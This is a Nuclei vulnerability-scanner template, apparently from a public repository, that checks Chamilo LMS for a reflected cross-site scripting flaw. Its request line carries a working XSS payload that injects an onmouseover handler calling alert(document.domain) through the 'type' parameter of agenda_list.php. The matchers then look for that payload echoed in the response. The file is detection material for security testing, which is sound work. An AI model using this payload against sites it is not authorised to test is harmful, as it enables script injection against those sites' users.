nuclei-templates/vulnerabilities/other/chamilo-lms-xss.yaml

28 lines
679 B
YAML
Raw Normal View History

2021-02-01 20:54:21 +00:00
id: chamilo-lms-xss
info:
name: Chamilo LMS Cross Site Scripting
author: geeknik
severity: medium
description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
tags: xss,chamilo
2021-02-01 20:54:21 +00:00
requests:
- method: GET
path:
2021-04-28 09:12:10 +00:00
- '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"'
2021-02-01 20:54:21 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2021-04-28 09:12:10 +00:00
- 'agenda_js.php?type=xss" onmouseover=alert(document.domain)'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"